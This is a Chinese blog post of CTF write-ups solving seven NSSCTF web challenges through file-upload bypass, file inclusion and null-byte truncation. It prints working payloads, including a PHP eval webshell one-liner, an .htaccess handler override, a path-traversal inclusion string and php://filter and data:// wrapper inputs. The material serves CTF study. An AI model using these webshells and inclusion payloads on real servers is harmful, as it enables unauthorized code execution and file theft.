NSSCTF之Web篇刷题记录(13)

已于 2023-06-02 09:33:49 修改
阅读量1.1k 收藏 7
点赞数 2
分类专栏: CTF 文章标签: 前端 php 开发语言
于 2023-06-01 15:50:39 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/Aluxian_/article/details/130980974
版权

NSSCTF之Web篇刷题记录[12]

NSSCTF平台:https://www.nssctf.cn/
PS:记得所有的flag都改为NSSCTF

[GXYCTF 2019]BabyUpload:

在这里插入图片描述

先传了一个一句话木马然后过滤了上传一个.htaccess文件 AddType application/x-httpd-php .jpeg(将.jpeg文件解析为php文件)

在这里插入图片描述

在这里插入图片描述
这里我们可以解析jpeg后 继续上传一个一句话木马的jpeg 但是 这里还有过滤(诶,别蒙我啊,这标志明显还是php啊)修改为:

GIF89a  
<script language="php">eval($_POST['cmd']);</script>

在这里插入图片描述

然后蚁🗡连接在根目录下看到flag

在这里插入图片描述

在这里插入图片描述

NSSCTF{13452adb-4b78-4942-bdea-9f90c17d4507}

[GKCTF 2020]cve版签到:

在这里插入图片描述
PHP 7.2.29之前的7.2.x版本、7.3.16之前的7.3.x版本和7.4.4之前的7.4.x版本中的get_headers()函数存在安全漏洞(\0可以截断)。攻击者可利用该漏洞造成信息泄露

使用%00截断 说我们url请求必须包含.ctfhub.com F12 提示flag在本地,还告诉了我们主机名必须以123结尾

在这里插入图片描述
Payload:?url=http://127.0.0.123%00www.ctfhub.com

在这里插入图片描述

NSSCTF{80f1e680-dcd3-407f-b001-fe43442fed83}

[HCTF 2018]Warmup:

在这里插入图片描述
在这里插入图片描述

<?php
    highlight_file(__FILE__);
    class emmm
    {
        public static function checkFile(&$page)
        {
            $whitelist = ["source"=>"source.php","hint"=>"hint.php"];
            if (! isset($page) || !is_string($page)) {
                echo "you can't see it";
                return false;
            }

            if (in_array($page, $whitelist)) {
                return true;
            }

            $_page = mb_substr(
                $page,
                0,
                mb_strpos($page . '?', '?')
            );
            if (in_array($_page, $whitelist)) {
                return true;
            }

            $_page = urldecode($page);
            $_page = mb_substr(
                $_page,
                0,
                mb_strpos($_page . '?', '?')
            );
            if (in_array($_page, $whitelist)) {
                return true;
            }
            echo "you can't see it";
            return false;
        }
    }

    if (! empty($_REQUEST['file'])
        && is_string($_REQUEST['file'])
        && emmm::checkFile($_REQUEST['file'])
    ) {
        include $_REQUEST['file'];
        exit;
    } else {
        echo "<br><img src=\"https://i.loli.net/2018/11/01/5bdb0d93dc794.jpg\" />";
    }  
?>

文件包含 Payload:file=hint.php?../../../../../ffffllllaaaagggg

在这里插入图片描述
在这里插入图片描述

NSSCTF{c5a0500a-bc52-40e2-b4e4-6155dc4ba55e}

[GDOUCTF 2023]泄露的伪装:

使用dirsearch 扫到了www.rar 打开文档有个路径 进行访问 然后就是代码审计

在这里插入图片描述
在这里插入图片描述
在这里插入图片描述

文件包含 根据代码审计以及file_get_contents读取文件内容函数我们可以知道我们需要传入一个文件,这里可以利用data://伪协议

Pyload:orzorz.php?cxk=data://text/plain,ctrl

在这里插入图片描述

NSSCTF{33af9a1f-f959-4d87-bdd0-e82ed1087876}

[羊城杯 2020]easycon:

一个Ubuntu默认页面访问index.php,提示eval post cmd应该是有一句话
直接蚁剑连接 🆗成功连接 发现bbbbbbbbb.txtBase64转图片

在这里插入图片描述
在这里插入图片描述
在这里插入图片描述

Base64转图片:https://tool.jisuapi.com/base642pic.html

在这里插入图片描述

NSSCTF{do_u_kn0w_c@idao}

[HNCTF 2022 Week1]Interesting_include:

在这里插入图片描述
直接文件包含flag.php使用伪协议?filter=php://filter/convert.base64-encode/resource=flag.php Base64解码即可。
在这里插入图片描述

NSSCTF{57b43a46-bd1c-4a2e-b15d-5bccff598016}

[HNCTF 2022 Week1]easy_upload:

直接上传一句话木马<?php @eval($_POST['cmd']);?> 然后WebShell工具连接即可。

在这里插入图片描述
在这里插入图片描述
在这里插入图片描述

NSSCTF{fd2184bf-1b85-4a1f-87a2-5beab899b5d0}

落寞的魚丶
关注
  • 2
    点赞
  • 7
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 0
    评论
专栏目录
nssctf文件test
03-30
1
[GDOUCTF 2023]泄露的伪装
BRMTSW的博客
06-22 532
PHP>=5.2.0起,可以使用data://数据流封装器,以传递相应格式的数据。通过分析我们可以利用file_get_content()函数配合php伪协议来获取flag。GET 参数是通过 URL 的查询字符串传递给脚本的数据。关闭了 PHP 的错误报告,这意味着在脚本执行过程中不会显示任何错误信息。发现一个/orzorz.php目录,进入访问。变量中指定的 URL 或文件的内容。的 GET 参数,将其值赋给变量。的 GET 参数,则输出字符串。
NSSCTF中的Vim yyds、Interesting_include、[HUBUCTF 2022 新生赛]checkin、EZ WEB、泄露的伪装、hate eat snake、ez_ez_php
最新发布
2401_82388450的博客
05-21 746
1.复习了vim缓存文件的解题方法2.学习到了true和非空、非零字符串比较都是为true,了解到了php弱比较的一种解题方式3.了解到了Flask 框架以及在bp中发送PUT请求。
[NSSCTF]-Web:[SWPUCTF 2021 新生赛]easy_sql解析
2301_79326813的博客
02-10 904
注意,这里需要把wllm设置为不为1的数(就是让他查不到数据就行,因为wllm=1查得到数据),不然它只会输出wllm=1查询到的数据。得到数据库名称就可以按顺序数据库-表-列来找flag了。有提示,参数是wllm,并且要我们输入点东西。从上图看应该是字符型漏洞,单引号字符注入。所以,我们尝试以get方式传入。报错了,说明字段数是3。有回显,但似乎没啥用。
BUUCTF [GXYCTF2019]BabyUpload 1详解(.htaccess配置文件特性)
m0_73734159的博客
11-29 1538
概述来说,htaccess文件是Apache服务器中的一个配置文件,它负责相关目录下的网页配置。通过htaccess文件,可以帮我们实现:网页301重定向、自定义404错误页面、改变文件扩展名、允许/阻止特定的用户或者目录的访问、禁止目录列表、配置默认文档等功能。通过源码可以看出这道文件上传题目主要还是考察.htaccess配置文件的特性。倘若不先上传.htaccess配置文件,那么后台服务器就无法解析php代码。先截断数据包再把上传的111.jpg文件更名为.htaccess文件。右键Repeater。
[SWPUCTF 2021 新生赛]traditional
03-15
在 SWPUCTF 2021 新生赛的传统题目中,我们看到了一道有趣的密码题目,它与八卦图和二进制数学有着紧密的联系。莱布尼茨是西方的二进制数学的发明者,他受到中国的八卦图的启发,演绎并推论出了数学矩阵,最后创造...
vm虚拟机-简单题目(hgame-week4-easyvm、cg-ctf wxyVM1/2
01-08
vm 比较经典的虚拟机的题目是南邮的cg-ctf的题目, 然后先写了前面的cg-ctf的两个题目,其实当时做的时候还没太大虚拟机的感觉,后面接触到hgame的题目,然后再看的时候就感觉到有些那个意思,但是两个题目是基础...
apachecn#apachecn-ctf-wiki#CTF-AWD靶场搭建和第一题题解_星星明亮的博客-CSDN博客_awd靶
07-25
1.根据当前队伍数量copy所有的队伍的比赛文件夹: 2.启动比赛: 1.每个队伍分配到一个docker主机,给定ctf用户权限,通过制定的端口和密码进行连接
BUUCTF学习笔记-BabyUpLoad
Emmawas的博客
09-28 703
考点:.htaccess绕过,文件内容为 AddType application/x-httpd-php .jpg,讲jpg文件按照php文件使用
【CTF】[GXYCTF 2019]BabyUpload
西原一点红的博客
06-19 856
说明是黑名单,且对上传的类型也做了校验。说明对上传的内容也做了校验。4. 修改上传内容绕过校验。
【CTF】[HNCTF 2022 Week1]easy_upload
西原一点红的博客
06-19 302
webshell工具连接,flag在/下 文件名ffflllaaaggg或者GET请求 获取/目录读取flag文件。
[GDOUCTF 2023] 部分web题解
qq_44640313的博客
04-18 1551
GDOUCTF 2023,主要见识了fenjing的使用
NSSCTF之Misc刷题记录
Aluxian_的博客
05-11 1551
[CISCN 2022 初赛]ez_usb [SWPUCTF 2021 新生赛]你喜欢osu吗? [SWPUCTF 2021 新生赛]Bill [SWPUCTF 2021 新生赛]二维码不止有二维码 [HGAME 2022 week1]好康的流量 [红明谷CTF 2022]MissingFile [广东省大学生攻防大赛 2021]这是道签到题 [羊城杯 2022]签个到
GDOUCTF web部分题解 2023
Jay17的博客
04-16 1936
GDOUCTF web部分题解 2023 (已加上NSS另外两题)
[HNCTF 2022 Week1]easy_upload
2302_81393479的博客
02-15 389
现在就用burpsuite抓包,然后上传木马。在filename里输入木马文件的文件名(命名随意)然后在下面上传一句话木马:<?> 所以这里就是用post接收oo这个变量。然后可以在右侧看到文件上传成功的路径:/upload/00.php。/upload/00.php,密码就是输入我们刚才用post接收的变量oo,然后点击添加。添加成功后就进入查看文件目录,然后找flag文件,点击查看。进来看到题目叫我们上传文件,所以可知我们可以上传一句话木马文件。
[GXYCTF2019]BabyUpload1 -- 题目分析与详解
2302_79800344的博客
03-03 1464
代码中并没有写传统的一句话木马,因为直接写一句话木马需要关闭系统防火墙。.htaccess 文件。
nssctf的jwt问3
08-17
首先将图像的背景填充为白色。 2. 在保存图片时,使用 `ImageIO.write()` 方法将二维码图像保存为 PNG 格式的图片文件。 3. 请确保您已经导入 `java.awt.image抱歉,我无法回答有关 nssctf 的问题。我是一个与开发者有关的 AI,.BufferedImage` 和 `javax.imageio.ImageIO` 类。 您可以根据需要修改保存图片的路径和文件名。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

落寞的魚丶

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值